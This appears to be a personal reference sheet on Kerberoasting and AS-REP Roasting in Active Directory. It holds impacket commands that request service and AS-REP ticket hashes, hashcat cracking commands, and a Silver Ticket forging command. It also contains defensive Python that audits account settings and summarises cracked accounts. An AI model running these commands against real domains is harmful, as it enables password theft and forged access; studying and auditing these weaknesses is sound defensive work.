These are some scribbles if I ever need to look up how to exploit Kerberoasting or AS-REP Roasting. I might expand on this later…

Note
This is nothing new, most of this stuff can be easily found on the Internet. This is just for my own reference. Please excuse my brevity.

Environment

For this article, we’re assuming the following (YMMV):

user $ echo $SHELL
/usr/bin/fish

user $ which GetUserSPNs.py
/usr/bin/GetUserSPNs.py
user $ which GetNPUsers.py
/usr/bin/GetNPUsers.py

user $ set win_domain company.org
user $ set dc_ip 192.168.1.1
user $ set regular_ad_user gijsbert

Enum

Using GetUserSPNs.py from impacket to check for Kerberoastable accounts:

user $ GetUserSPNs.py {$win_domain}/{$regular_ad_user}

Retrieve Kerberoastable encrypted hashes:

user $ GetUserSPNs.py {$win_domain}/{$regular_ad_user} -request -outputfile \
         hashes.spnroast

Using GetNPUsers.py (also from impacket) to check for AS-REP Roastable accounts:

user $ GetNPUsers.py {$win_domain}/{$regular_ad_user}

Retrieve AS-REP Roastable encrypted hashes:

user $ GetNPUsers.py {$win_domain}/{$regular_ad_user} -request -format \
         hashcat -outputfile hashes.asreproast
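The two impacket tools above select on a handful of account properties: an enabled, non-computer account that carries a servicePrincipalName (Kerberoastable) or has the DONT_REQ_PREAUTH bit set in userAccountControl (AS-REP Roastable). The same criteria are what you want to audit on the defending side, together with msDS-SupportedEncryptionTypes, which decides whether a captured ticket lands in the RC4 ("$krb5tgs$23$") or AES ("$krb5tgs$17$"/"$krb5tgs$18$") cracking modes below. The following is an added Python example, not code from impacket or from this page; it runs over a constructed, in-memory list of directory records (there is no LDAP query in it), and the bit values are the documented userAccountControl and msDS-SupportedEncryptionTypes flags. Treating an unset msDS-SupportedEncryptionTypes as "RC4 still possible" is an assumption; check the actual defaults on your DCs.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# userAccountControl bits (documented Microsoft values).
UAC_ACCOUNTDISABLE = 0x0002
UAC_NORMAL_ACCOUNT = 0x0200
UAC_DONT_REQ_PREAUTH = 0x400000

# msDS-SupportedEncryptionTypes bits (documented Microsoft values).
ENC_RC4_HMAC = 0x04
ENC_AES128 = 0x08
ENC_AES256 = 0x10


@dataclass
class AccountRecord:
    """One directory object, reduced to the attributes the audit needs."""
    sam: str
    uac: int
    spns: List[str] = field(default_factory=list)
    object_category: str = "person"      # "person" or "computer"
    enc_types: Optional[int] = None      # None: attribute not set on the object


def audit_account(acct: AccountRecord) -> List[str]:
    """Return roasting-related findings for a single account.

    Enabled, non-computer accounts only (krbtgt excluded), which is the same
    population GetUserSPNs.py / GetNPUsers.py select on.
    """
    findings: List[str] = []
    if (acct.uac & UAC_ACCOUNTDISABLE
            or acct.object_category == "computer"
            or acct.sam.lower() == "krbtgt"):
        return findings

    if acct.spns and acct.uac & UAC_NORMAL_ACCOUNT:
        findings.append("kerberoastable: SPN(s) " + ", ".join(acct.spns))
        enc = acct.enc_types or 0
        if not enc & (ENC_AES128 | ENC_AES256):
            # Assumption: no AES flag (or attribute unset) means service tickets
            # come back as etype 23, i.e. the hashcat -m 13100 case.
            findings.append("rc4-only: service tickets will be etype 23 (hashcat -m 13100)")
        elif enc & ENC_RC4_HMAC:
            findings.append("rc4-allowed: AES supported but RC4 not disabled")

    if acct.uac & UAC_DONT_REQ_PREAUTH:
        findings.append("asrep-roastable: DONT_REQ_PREAUTH set (hashcat -m 18200)")
    return findings


def audit_directory(records: List[AccountRecord]) -> Dict[str, List[str]]:
    """Map sAMAccountName -> findings, for accounts that have any."""
    report = {}
    for acct in records:
        found = audit_account(acct)
        if found:
            report[acct.sam] = found
    return report


# Constructed sample directory; names and SPNs are made up for this example.
SAMPLE_DIRECTORY = [
    AccountRecord("svc_sql", UAC_NORMAL_ACCOUNT,
                  ["MSSQLSvc/sql01.company.org:1433"]),                      # SPN, enc types unset
    AccountRecord("svc_web", UAC_NORMAL_ACCOUNT,
                  ["HTTP/web01.company.org"], enc_types=ENC_AES128 | ENC_AES256),
    AccountRecord("legacy_app", UAC_NORMAL_ACCOUNT | UAC_DONT_REQ_PREAUTH),   # no pre-auth
    AccountRecord("old_svc", UAC_NORMAL_ACCOUNT | UAC_DONT_REQ_PREAUTH | UAC_ACCOUNTDISABLE),
    AccountRecord("WS01$", 0x1000, ["HOST/ws01.company.org"], object_category="computer"),
    AccountRecord("gijsbert", UAC_NORMAL_ACCOUNT),
]

if __name__ == "__main__":
    for sam, findings in audit_directory(SAMPLE_DIRECTORY).items():
        for f in findings:
            print(f"{sam}: {f}")
```

Accounts that show up as "rc4-only" are the ones whose tickets end up in the 13100 mode; moving them to AES (and, for services, to long random passwords or gMSA) is the corresponding fix, while "asrep-roastable" accounts simply need DONT_REQ_PREAUTH cleared.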

Cracking

Cracking "$krb5tgs$23$" type hashes (RC4), using a hashcat rule-based attack (Kerberoasting):

user $ hashcat -O -m 13100 -w 3 -a 0 --session=rule -o cracked.out \
         --outfile-format=3 hashes.spnroast cracked-dict-history \
         --potfile-path hashcat.pot -r d3adhob0.rule

Cracking "$krb5tgs$17$" type hashes (AES-128), using a hashcat rule-based attack (Kerberoasting):

user $ hashcat -O -m 19600 -w 3 -a 0 --session=rule -o cracked.out \
         --outfile-format=3 hashes.spnroast cracked-dict-history \
         --potfile-path hashcat.pot -r OneRuleToRuleThemStill.rule

Cracking "$krb5tgs$18$" type hashes (AES-256), using a hashcat rule-based attack (Kerberoasting):

user $ hashcat -O -m 19700 -w 3 -a 0 --session=rule -o cracked.out \
         --outfile-format=3 hashes.spnroast cracked-dict-history \
         --potfile-path hashcat.pot -r OneRuleToRuleThemStill.rule

Cracking "$krb5asrep$23$" type hashes, using a hashcat rule-based attack (AS-REP Roasting):

user $ hashcat -O -m 18200 -w 3 -a 0 --session=rule -o cracked.out \
         --outfile-format=3 hashes.asreproast cracked-dict-history \
         --potfile-path hashcat.pot -r OneRuleToRuleThemStill.rule

Analysis

Show the accounts whose hashes have been cracked:

user $ cut -d \$ -f 1-5 hashcat.pot
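The cut pipeline works for the "$krb5tgs$" lines, where the first five "$"-separated fields stop at the realm. It does not work for "$krb5asrep$" lines: there the user, realm and checksum share one field, so fields 1-5 are the whole potfile line, cleartext included. The Python below is an added example (not part of this page or of hashcat) that parses the three hash shapes impacket writes and hashcat stores in the potfile, "$krb5tgs$23$*user$REALM$spn*$...", "$krb5tgs$17|18$user$REALM$*spn*$..." and "$krb5asrep$23$user@REALM:...", and reports account, realm, SPN and etype while discarding the password. The potfile content is constructed, with shortened fake hex, and the potfile path is whatever you pass in.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class CrackedRoast:
    fmt: str             # "krb5tgs" or "krb5asrep"
    etype: int           # 23 = RC4-HMAC, 17 = AES128-CTS, 18 = AES256-CTS
    user: str
    realm: str
    spn: Optional[str]   # None for AS-REP hashes and SPN-less TGS hashes


def split_pot_line(line: str) -> Tuple[str, str]:
    """Split a potfile 'hash:plain' line into (hash, plain).

    Splitting on ':' naively fails: the hash can contain ':' (SPN ports,
    the AS-REP 'user@REALM:checksum' field) and so can the password. The
    data after the hash's last '$' is hex, so the first ':' after that
    '$' is the real separator.
    """
    last_dollar = line.rfind("$")
    colon = line.find(":", last_dollar)
    if last_dollar < 0 or colon < 0:
        raise ValueError("not a hashcat potfile line: %r" % line)
    return line[:colon], line[colon + 1:]


def parse_roast_hash(h: str) -> CrackedRoast:
    """Parse a $krb5tgs$ / $krb5asrep$ hash into its identifying parts."""
    parts = h.split("$", 3)                     # ['', fmt, etype, rest]
    if len(parts) != 4 or parts[0] != "" or parts[1] not in ("krb5tgs", "krb5asrep"):
        raise ValueError("unsupported hash format: %r" % h[:24])
    fmt, etype, rest = parts[1], int(parts[2]), parts[3]

    if fmt == "krb5asrep":
        # $krb5asrep$23$user@REALM:checksum$edata
        user, realm = rest.split(":", 1)[0].split("@", 1)
        return CrackedRoast(fmt, etype, user, realm, None)

    if rest.startswith("*"):
        # $krb5tgs$23$*user$REALM$spn*$checksum$edata
        user, realm, spn = rest[1:rest.index("*", 1)].split("$", 2)
        return CrackedRoast(fmt, etype, user, realm, spn)

    # $krb5tgs$17$user$REALM$*spn*$checksum$edata  (the *spn* field is optional)
    user, realm, tail = rest.split("$", 2)
    spn = tail[1:tail.index("*", 1)] if tail.startswith("*") else None
    return CrackedRoast(fmt, etype, user, realm, spn)


def cracked_accounts(potfile_text: str) -> List[CrackedRoast]:
    """Return the roasted accounts in a potfile; the cleartexts are dropped."""
    found = []
    for line in potfile_text.splitlines():
        line = line.strip()
        if not line.startswith("$krb5"):
            continue                            # other hash types share the potfile
        h, _plain = split_pot_line(line)        # password deliberately discarded
        found.append(parse_roast_hash(h))
    return found


def rc4_accounts(results: List[CrackedRoast]) -> List[str]:
    """Accounts whose cracked ticket was RC4: those still allow etype 23."""
    return [r.user for r in results if r.etype == 23]


# Constructed potfile; hex is shortened and the cleartexts are made up.
SAMPLE_POT = """\
$krb5tgs$23$*svc_sql$COMPANY.ORG$MSSQLSvc/sql01.company.org:1433*$1a2b3c4d5e6f7a8b$aabbccddeeff0011:Summer2023!
$krb5tgs$18$svc_web$COMPANY.ORG$*HTTP/web01.company.org*$0011223344556677$8899aabbccddeeff:P@ss:word
$krb5asrep$23$legacy_app@COMPANY.ORG:1a2b3c4d5e6f7a8b$aabbccddeeff0011:Welcome1
5f4dcc3b5aa765d61d8327deb882cf99:password
"""

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_POT
    for r in cracked_accounts(text):
        print(f"{r.fmt:10} etype={r.etype} {r.user}@{r.realm} spn={r.spn}")
```

Run it as `python3 potreport.py hashcat.pot` (a hypothetical file name) to get an account list you can hand over without the cleartexts; anything returned by `rc4_accounts()` is an account where RC4 is still negotiable and AES-only enforcement is the follow-up.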

Printing Tickets

Print a Kerberos Silver Ticket, using the cracked hash (WIP):

user $ ticketer.py -password 'xxxxxxxx' -domain-sid \
         'S-1-5-21-xxxxxxxxx-xxxxxxxxxx-xxxxxxxxxx' -domain $win_domain \
         -dc-ip $dc_ip -spn '<spn>' <vuln_account>